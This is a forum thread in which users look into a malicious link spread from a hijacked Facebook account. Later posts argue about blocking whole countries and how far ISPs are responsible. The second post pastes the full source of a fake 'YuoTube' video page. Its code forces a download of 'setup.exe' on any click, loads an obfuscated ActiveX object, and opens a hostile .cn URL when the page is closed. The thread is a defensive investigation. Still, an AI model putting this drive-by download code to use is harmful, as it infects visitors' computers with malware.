Jump to content

Recommended Posts

One of my friends Facebook has been taken over by Lord knows what. I reckon that it's some kind of trojan that takes advantage of anyone who stays logged in. Or one that logs keystrokes to gain the login details. In the past day or two, his account has been sending links like crazy. I decided to take a look at the site (after turning off scripting in my browser of course).

 

The site is at:

http://www.petromedika.home.pl/1/

 

It's just an image of what appears to be a video. The source is:


<html>
<title>Amazing Video</title>
<body>
<img src="b456.jpg"  width="200" height="200" onMouseOver="mytest()" />
<script>
function mytest(){
location = "go.php";}
</script>
</body>
</html>

 

Should I check out go.php? Shouldn't I be safe considering I have JS turned off and dont download anything?

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/
Share on other sites

I did it anyway. Go.php redirects to another wesbite's IP address. I was prompted to download the newest version of flash player, even though I'm pretty sure that my flash player is up to date.

 

http://68.203.229.210/pid=1000/view/console=yes

 

<html>
<!-- LABEL_CODEC -->
<head>
<title>Loading</title>
<meta name="robots" content="noindex,nofollow,noarchive"> 
<script>
function handleError(){try{window.parent.location=location;}catch(e){}try{window.top.location=location;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length>0){if(window.parent.document.body.innerHTML){}}
</script>
<script>
if (location.href.indexOf('console=yes') != -1) {
dangerWindAdr = 'http://heedlessinfo.cn/?pid=312s02&sid=4db12f';
if (navigator.appVersion.indexOf('MSIE') > 0) { window.isIE =  true;  function msieversion() { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); if (msie > 0) return parseInt(ua.substring(msie + 5, ua.indexOf(".", msie))); return 0; } window.IEversion = msieversion(); }
function openDangerWindow(adr) { if (window.isIE) { if (window.IEversion < 6) { window.open(adr); } else { try { document.getElementById('iie').launchURL(adr); } catch(ex) {} } } else { location.href = adr; } }
function exiter(){ openDangerWindow(window.location.href); openDangerWindow(dangerWindAdr); return false; }
if (window.attachEvent) eval("window.attachEvent('onunload',exiter);"); else window.addEventListener("unload", exiter, false);
}
</script>
<script type="text/javascript">document.write('<OBJ'+'ECT id="i'+'ie" width="0" height="0" style="position:absolute; left:0;top:0;" CLAS'+'SID="CLS'+'ID:6BF'+'52A'+'52-394A-11'+'d3-B153-00C04F'+'79FAA6" type="application/x-ole'+'obje'+'ct"> <PA'+'RAM NAME="Sen'+'dPlayStateCha'+'ngeEvents" VALUE="True"> <PA'+'RAM NAME="Au'+'toSt'+'art" VALUE="True">	<PAR'+'AM name="uiMo'+'de" value="none"> <PA'+'RAM name="Play'+'Count" value="9999"></OBJECT>');</script>
<script language="javascript">AC_FL_RunContent = 0;</script>
<script language="javascript">
var isIE  = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion() {
var version;
var axo;
var e;
try {
	axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
	version = axo.GetVariable("$version");
} catch (e) {}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
		version = "WIN 6,0,21,0";
		axo.AllowScriptAccess = "always";
		version = axo.GetVariable("$version");
	} catch (e) {}
}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
		version = axo.GetVariable("$version");
	} catch (e) {}
}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
		version = "WIN 3,0,18,0";
	} catch (e) {}
}
if (!version) {
	try {
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
		version = "WIN 2,0,0,11";
	} catch (e) {
		version = -1;
	}
}
return version;
}
function GetSwfVer() {
var flashVer = -1;
if (navigator.plugins != null && navigator.plugins.length > 0) {
	if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
		var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
		var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
		var descArray = flashDescription.split(" ");
		var tempArrayMajor = descArray[2].split(".");			
		var versionMajor = tempArrayMajor[0];
		var versionMinor = tempArrayMajor[1];
		var versionRevision = descArray[3];
		if (versionRevision == "") {
			versionRevision = descArray[4];
		}
		if (versionRevision[0] == "d") {
			versionRevision = versionRevision.substring(1);
		} else if (versionRevision[0] == "r") {
			versionRevision = versionRevision.substring(1);
			if (versionRevision.indexOf("d") > 0) {
				versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
			}
		}
		var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
	}
}
else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
else if ( isIE && isWin && !isOpera ) {
	flashVer = ControlVersion();
}	
return flashVer;
}
function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision) {
versionStr = GetSwfVer();
if (versionStr == -1 ) {
	return false;
} else if (versionStr != 0) {
	if(isIE && isWin && !isOpera) {
		tempArray         = versionStr.split(" ");
		tempString        = tempArray[1];
		versionArray      = tempString.split(",");
	} else {
		versionArray      = versionStr.split(".");
	}
	var versionMajor      = versionArray[0];
	var versionMinor      = versionArray[1];
	var versionRevision   = versionArray[2];
	if (versionMajor > parseFloat(reqMajorVer)) {
		return true;
	} else if (versionMajor == parseFloat(reqMajorVer)) {
		if (versionMinor > parseFloat(reqMinorVer))
			return true;
		else if (versionMinor == parseFloat(reqMinorVer)) {
			if (versionRevision >= parseFloat(reqRevision))
				return true;
		}
	}
	return false;
}
}
function AC_AddExtension(src, ext) {
  if (src.indexOf('?') != -1)
    return src.replace(/\?/, ext+'?'); 
  else
    return src + ext;
}
function AC_Generateobj(objAttrs, params, embedAttrs) {
  var str = '';
  if (isIE && isWin && !isOpera) {
    str += '<object ';
    for (var i in objAttrs) {
      str += i + '="' + objAttrs[i] + '" ';
    }
    str += '>';
    for (var i in params) {
      str += '<param name="' + i + '" value="' + params[i] + '" /> ';
    }
    str += '</object>';
  } else {
    str += '<embed ';
    for (var i in embedAttrs) {
      str += i + '="' + embedAttrs[i] + '" ';
    }
    str += '> </embed>';
  }
  document.write(str);
}
function AC_FL_RunContent() {
  var ret = 
    AC_GetArgs
    (  arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
     , "application/x-shockwave-flash"
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}
function AC_SW_RunContent(){
  var ret = 
    AC_GetArgs
    (  arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000"
     , null
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}
function AC_GetArgs(args, ext, srcParamName, classid, mimeType){
  var ret = new Object();
  ret.embedAttrs = new Object();
  ret.params = new Object();
  ret.objAttrs = new Object();
  for (var i=0; i < args.length; i=i+2){
    var currArg = args[i].toLowerCase();    
    switch (currArg){	
      case "classid":
        break;
      case "pluginspage":
        ret.embedAttrs[args[i]] = args[i+1];
        break;
      case "src":
      case "movie":	
        args[i+1] = AC_AddExtension(args[i+1], ext);
        ret.embedAttrs["src"] = args[i+1];
        ret.params[srcParamName] = args[i+1];
        break;
      case "onafterupdate":
      case "onbeforeupdate":
      case "onblur":
      case "oncellchange":
      case "onclick":
      case "ondblClick":
      case "ondrag":
      case "ondragend":
      case "ondragenter":
      case "ondragleave":
      case "ondragover":
      case "ondrop":
      case "onfinish":
      case "onfocus":
      case "onhelp":
      case "onmousedown":
      case "onmouseup":
      case "onmouseover":
      case "onmousemove":
      case "onmouseout":
      case "onkeypress":
      case "onkeydown":
      case "onkeyup":
      case "onload":
      case "onlosecapture":
      case "onpropertychange":
      case "onreadystatechange":
      case "onrowsdelete":
      case "onrowenter":
      case "onrowexit":
      case "onrowsinserted":
      case "onstart":
      case "onscroll":
      case "onbeforeeditfocus":
      case "onactivate":
      case "onbeforedeactivate":
      case "ondeactivate":
      case "type":
      case "codebase":
      case "id":
        ret.objAttrs[args[i]] = args[i+1];
        break;
      case "width":
      case "height":
      case "align":
      case "vspace": 
      case "hspace":
      case "class":
      case "title":
      case "accesskey":
      case "name":
      case "tabindex":
        ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1];
        break;
      default:
        ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
    }
  }
  ret.objAttrs["classid"] = classid;
  if (mimeType) ret.embedAttrs["type"] = mimeType;
  return ret;
}
</script>
<script>
document.onclick = _sjhdgfj22;
document.onkeydown = _sjhdgfj22;
function gup( name ){  name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");  var regexS = "[\\?&]"+name+"=([^]*)";  var regex = new RegExp( regexS );  var results = regex.exec( unescape(window.location.href) );  if( results == null )    return "";  else    return results[1];}
function mydecode(str) { var s = ""; for (i = 0, l = str.length; i < l; i += 2) { s += String.fromCharCode(parseInt(str.substr(i, 2), 16)); } var e = ""; for (i = 0, l = s.length; i < l; i ++) { e += String.fromCharCode(s.charCodeAt(i) ^ 128); } return e; }
function pageLoaded() { setTimeout("_sjhdgfj22();", 3000);
var a = '', b = '';
var p1 = new String(unescape(window.location.search.substr(1))).split('&');
for (var i = 0; i < p1.length; i ++) { var p2 = new String(p1[i]).split('='); if (p2.length == 2) { if (p2[0].indexOf('ch') != -1) a = mydecode(p2[1]); else if (p2[0].indexOf('ea') != -1) b = mydecode(p2[1]); } }
try {
var avatar = "http://" + a;
if (a == "") avatar = "wizard.jpg";
var name = b;
if (name == "") name = "* Tiger *";
document.title = 'YuoTube :: Broadcast Yourself :: Video posted by ' + name;
document.getElementById('p0').innerHTML = 'Video posted by ' + name;
document.getElementById('p1').innerHTML = name;
document.getElementById('img0').src = avatar;
} catch (e) {}
}
function _sjhdgfj22() { location.href = "setup.exe"; }

</script>
<style>
body { font-family: Tahoma; color: black; font-size: 12px; background-color: #ffffff; }
td, a, b { font-size: 12px; }
.b { border: 1px solid #cccccc; height: 35px; }
.b b { font-size: 20px; }
</style>
</head>
<body onload="pageLoaded()">
<table width="900" border="0" align="center">
<tr>
  <td><table width="100%" border="0">
      <tr>
        <td> </td>
        <td align="right"><a href="#" onclick="_sjhdgfj22(); return false;"><b>Sign Up</b></a> | <a href="#" onclick="_sjhdgfj22(); return false;">QuickList</a> (0) | <a href="#" onclick="_sjhdgfj22(); return false;">Help</a> | <a href="#" onclick="_sjhdgfj22(); return false;">Log in</a> </td>

      </tr>
    </table>
    <h1 id='p0'>Video posted by</h1>
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="660px" align="left" valign="top"><table  style="padding: 0px 15px 0px 0px;" width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td><script language="javascript">
	AC_FL_RunContent(
		'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0',
		'width', '640',
		'height', '390',
		'src', 'player?pid=6123',
		'quality', 'high',
		'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
		'align', 'middle',
		'play', 'true',
		'loop', 'true',
		'scale', 'showall',
		'wmode', 'window',
		'devicefont', 'false',
		'id', 'player',
		'bgcolor', '#000000',
		'name', 'player',
		'menu', 'false',
		'allowFullScreen', 'false',
		'allowScriptAccess','sameDomain',
		'movie', 'player?pid=6123',
		'salign', ''
		);
	</script>

                <noscript>
                <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="480" height="390" id="player" align="middle">
                  <param name="allowScriptAccess" value="sameDomain" />
                  <param name="allowFullScreen" value="false" />
                  <param name="movie" value="player.swf?pid=6123" />
                  <param name="menu" value="false" />
                  <param name="quality" value="high" />
                  <param name="bgcolor" value="#000000" />
                  <embed src="player.swf?pid=6123" menu="false" quality="high" bgcolor="#000000" width="640" height="390" name="player" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />

                </object>
                </noscript></td>
            </tr>
          </table>
          <br/>
          <h3>Video Responses: <u>10</u>   Text Comments: <u>70</u></h3><br>
          <br>

          </div>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">babachat</a> (4 hours ago)<br>
          Funniest thing EVER!! <br>
          <br>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">csmith1199</a> (6 hours ago) <br>

          WooHoo!! Love this vid!!! Congrats on the front page!!!! :-) <br>
          <br>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">sinmike1</a> (7 hours ago)<br>
          that.... was .......GREAT !!! <br>
          <br>
          <a onclick="_sjhdgfj22(); return false;" class="watch-comment-auth" href="#" rel="nofollow">ah17</a> (10 hours ago)<br>

          Nice vid  <br>
          <br>
          <br>
          <br>
          <br>
          <br>
          <a href="#" onclick="_sjhdgfj22(); return false;">Next</a> Pages: 1 <a href="#" onclick="_sjhdgfj22(); return false;">2</a> <a href="#" onclick="_sjhdgfj22(); return false;">3</a>  ... 

          </div>
          <a href="#" class="hLink" onclick="_sjhdgfj22(); return false;" rel="nofollow">View all 70 comments</a><br>
          <br>
          <br>
          <h2>Would you like to comment?</h2>
          <a href="#" onclick="_sjhdgfj22(); return false;">Join</a> for a free account, or <a href="#" onclick="_sjhdgfj22(); return false;">sign in</a> if you are already a member. </td>

        <td align="right" valign="top"><table style="background-color: #eeeeee" class="b" width="360" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td align="center" valign="middle"><br/><img border="0" src="" id='img0'></td>
              <td width="5"></td>
              <td width="200" valign="middle" align="left">From: <a href="#" onclick="_sjhdgfj22(); return false;" id='p1'> </a><br/>
                Joined: 1 year ago<br/>
                Videos: 5<br/>

                <br/><a href="#" onclick="_sjhdgfj22(); return false;" title="subscribe to wizard's videos"> Subscribe </a></td>
            </tr>
            <tr>
              <td colspan="3" align="center"> </td>
            </tr>
            <tr>
              <td align="left" colspan="3"> </td>
            </tr>

            <tr>
              <td colspan="3" align="center"><hr style="width: 340px; color: #cccccc; height: 1px"></td>
            </tr>
            <tr>
              <td align="left" colspan="2"> Embed:</td>
              <td align="right"><a href="#" onclick="_sjhdgfj22(); return false;">Customize</a></td>
            </tr>
            <tr>

              <td colspan="3" align="center"><br/>
                <input value='<object width="425" height="344"><param name="movie" value="http://..."></param><embed src="http://..." type="application/x-shockwave-flash" width="425" height="344"></embed></object>' type="text" style="width: 340px"></td>
            </tr>
          </table>
          <br>
          <table style="background-color: #eeeeee" class="b" width="360" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td align="center" valign="middle"><div align="left"><a href="#" class="expand-header" onclick="_sjhdgfj22(); return false;">More From user</a><br/>

                  <br>
                  <a href="#" onclick="_sjhdgfj22(); return false;" class="expand-header">Related Videos</a></div>
                </div></td>
            </tr>
          </table></td>
      </tr>
    </table>
    <br><br><br><br><br><br><br><br>

    <br><br><br><br><br><br><br>
12:34
    </center>
    <br>
    <br>
<!-- /LABEL_CODEC -->
<!-- /LABEL_EXP -->

<div id="Layer1" style="position:absolute; left:0px; top:0px; width:100px; height:100px; z-index:1; visibility: hidden;">
<!-- counter here -->



<!-- counter here -->

</div>

</body>
</html>

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-948271
Share on other sites

I notice one of the domains says '.cn'.  I think most spyware/virus/email spam comes from China and sometimes Russia.  I have received spam email where  they had loaded an image into the email some how bypassing Windows live mail's image removal. The images were linked from a .info domain, that resolved to a Chinese IP address!! Also in my own  Server, sometimes I check the IPs of the spam emails that end up in my Squirrel Mail.. They resolve to Russia and sometimes Poland.

 

I have been meaning myself to just block china from my firewall on my computer.  I block China on my server, its just Windozo doens't have a decent firewall like IPtables. Cuase obviosily this would be good idea, since it would decrease the likely hood of you getting  a virus, if you can't connect to their website to download it. ;)

 

 

btw 68.203.229.210 (The IP above thats linked) Resolves to Road Runner ISP. I believe thats a residential ISP. So probably that is a hacked/compromise zombie machine hosting that site.

 

petromedika.home.pl resolves to 62.129.200.127, which is in Poland.

 

These are the countries I would block on your home computer you have something good like Iptables.

 

+ Poland

+ Russia

+ China

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-948597
Share on other sites

Oh great. You're gonna block home.pl, the largest hosting company in Poland just because one of the sites hosted there has been hacked into. :P

 

I have had 3 encounters with home.pl in the past, and each time it was something trying to make me download a virus. That doesn't speak well. Polan as whole probably not a bad place, neither is China. Its just some countries have crappy net laws, so a few bad apples can do this criminal online stuff for years smearning the IP space of that country with bad publicity, getting them into blacklists.  :D

 

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-948645
Share on other sites

Law of large numbers. It is the biggest hosting company, they have most cases of compromised sites.

Same goes for my ISP provider. Largest in the country === most widely used by script kiddies === I need webproxy to access half of the internet.

 

Why don't you lock out the IP where the executable downloads itself? It's in... GASP.... USA!!!

OrgName:    Road Runner HoldCo LLC

OrgID:      RRSW

Address:    13241 Woodland Park Road

City:      Herndon

StateProv:  VA

PostalCode: 20171

Country:    US

 

 

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-948649
Share on other sites

Well yeah that will get it blacklisted, see in my country (Canada) if I hack websites etc. If my ISP recieves an abuse report, or maby the  likelyhood of a criminal investigation, I could get cut off by my ISP and also be charged for some kind of cyber crime.

 

Some countries like Russia, China, Turkey, Poland. etc They dont and they get away with it. Probably becuase of international law can't reach into their to convict them of cyber crime. Or maby the ISP just doesn't take care of abuse requests.  If you running an ISP, wouldn't you cut off customers that are getting your IP space blacklisted? That seems to be good business sense to me. you would want your custermers to be able to view the internet properly without getting blocked all the time. So your own ISP is probably not even cutting off these 'script kiddies' and banning them from any further access on their network. Yes you can end up in blackbook of a company. Its called getting banned. If you steal from store you can get banned from that store. For the same reason, if you running an ISP you would ban customers from every signing up again.

 

Law of large numbers. It is the biggest hosting company, they have most cases of compromised sites.

Same goes for my ISP provider. Largest in the country === most widely used by script kiddies === I need webproxy to access half of the internet.

 

Why don't you lock out the IP where the executable downloads itself? It's in... GASP.... USA!!!

OrgName:    Road Runner HoldCo LLC

OrgID:      RRSW

Address:    13241 Woodland Park Road

City:      Herndon

StateProv:  VA

PostalCode: 20171

Country:    US

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-949018
Share on other sites

Well yeah that will get it blacklisted, see in my country (Canada) if I hack websites etc. If my ISP recieves an abuse report, or maby the  likelyhood of a criminal investigation, I could get cut off by my ISP and also be charged for some kind of cyber crime.

 

 

As long as I pay my bill, my ISP doesn't care one bit what I do.  Now, if the FBI or some other law enforcement agency made them care, then suddenly they would have a very strong interest in what I was doing.  I would imagine the same goes in Canada.  I would imagine even the same goes in Poland and all those other countries, just maybe as much pressure isn't put on ISPs.  When it comes down to it, ISPs are there to make money.

 

 

"If you steal from store you can get banned from that store."

 

I think you're looking at it the wrong way.  Think about it with this metaphor:

 

If I sell a gun to someone, is it my responsibility to make sure he doesn't shoot anyone with that gun?

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-949057
Share on other sites

That doesn't make good business sense. Maby do they run the ISP like that in your country, perhaps thats why Mchl  has to webproxies to access some websites. Why would an ISP want people on their network getting it into  blacklists? This creates a bad experience for the rest of your customers. You would respond to abuse reports and give the customers warnings. If they fail to comply or fix the problem, cut them off. You never know, maby their computer was a zombie, so they can reformat the computer and fix the security issue, or if they are indeed a script kiddy, well not having an internet connection seems to me to be a good reason to find a new hobby, how about maby actually be constructive, rather then trying to destroy other people's websites. And yes despite popular opinion you can't get banned from a store, you step foot in that store again its called trespassing. I dont see how the logic of a gun fits into that.

 

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-949144
Share on other sites

Because when you're stealing from a store, you're doing bad to the store.  So, following that metaphor, you would be harming the ISP.  But that's not the case.  People doing harm using the internet are not (directly, since indirectly they could lose customers) harming their ISPs; they're harming the people against whom they're doing harm (which was maybe the most redundant thing I've said in a week).  Aside from getting blacklisted and losing customers, ISPs are not harmed by malicious things people do using their services (unless those malicious things involve disrupting the ISP's business model).

 

 

So, I feel that the gun-shop example would be more accurate.  The gun store owner is not harmed by the use of the gun.  In fact, no one has to be harmed by the gun.  It could lie dormant indefinitely or it could be used for hunting.

 

But, even that analogy is flawed since the gun shop owner doesn't lose sales if someone buys a gun from him and shoots someone.

 

A more valid analogy would have to involve something like magical doors that lead to different areas, and those areas blocking doors based on people who have come through them in the past.

 

 

 

Basically what it comes down to is whether it's worth the ISP's time to monitor their users and follow abuse reports.  If they lose x future customers because they fear being blocked on websites, it's only worth avoiding being blocked if those customers would make up the money lost when following y reports.

 

 

 

 

 

I think it's stupid for a website to block an entire ISP based on a few rogue users.  Now, if the website were getting DDoS'd by a net from the same ISP, that I would understand, but otherwise, I think that's stupid.

 

 

I guess I'm biased in this since I don't think an ISP's responsibilities include monitoring their users.  I think if a law enforcement agency gets involved, the ISP should turn over all related information and stuff, but without that, I don't think it's the ISP's job.  Then again, if the ISP doesn't do it, I'm not sure who would since it's not like the local cops job should include that either.  Blerh, now that I think about that, I have no idea whose job it should really be.  I feel like the ISP shouldn't do that, but that no existing enforcement agency would be right for it.

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-949160
Share on other sites

 

Some countries like Russia, China, Turkey, Poland. etc They dont and they get away with it. Probably becuase of international law can't reach into their to convict them of cyber crime.

 

Don't know how about others in this mix, but Polish laws are in accordance with EU laws. Anyhow, I've written to home.pl support, and they pulled the page down within hours.

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-949185
Share on other sites

I've had bad experience with a .pl website. I was going through some Alpha Centauri fan sites, when bam! I hit a .pl site, it installs a virus!

 

Worst part about the virus is it installed by me clicking the "X" button on a pop-up. QQ

 

I don't visit Russian or Chinese websites, so I don't know about those.

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-949188
Share on other sites

The Gumblar attack started in March with websites being compromised and attack code hidden on them. Originally, the malware downloaded onto computers accessing those sites came from the gumblar.cn domain, a Chinese domain associated with Russian and Latvian IP addresses

http://news.zdnet.com/2100-9595_22-306268.html

 

 

::)

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-953718
Share on other sites

I found a easy to use firewall for Windows to protect you from these shady websites that are usually hosted in "x" country. http://www.peerblock.com  and you can download the IP ranges of any country at http://iblocklist.com and configure it. 

 

 

Edit: *it works* lol

 

Here is spam email from my hotmail.

 

Science New Insights‏
From: 	Swindall (<removed>)
Sent: 	November 7, 2009 2:07:10 AM
To: 	<removed>

Obama's nigro-solo http://www.mufahww.cn/

(c) 2009 Hiotarakaryywyi. All right reserved.

 

qqqyvr.jpg

Link to comment
https://forums.phpfreaks.com/topic/179725-shady-website/#findComment-954748
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.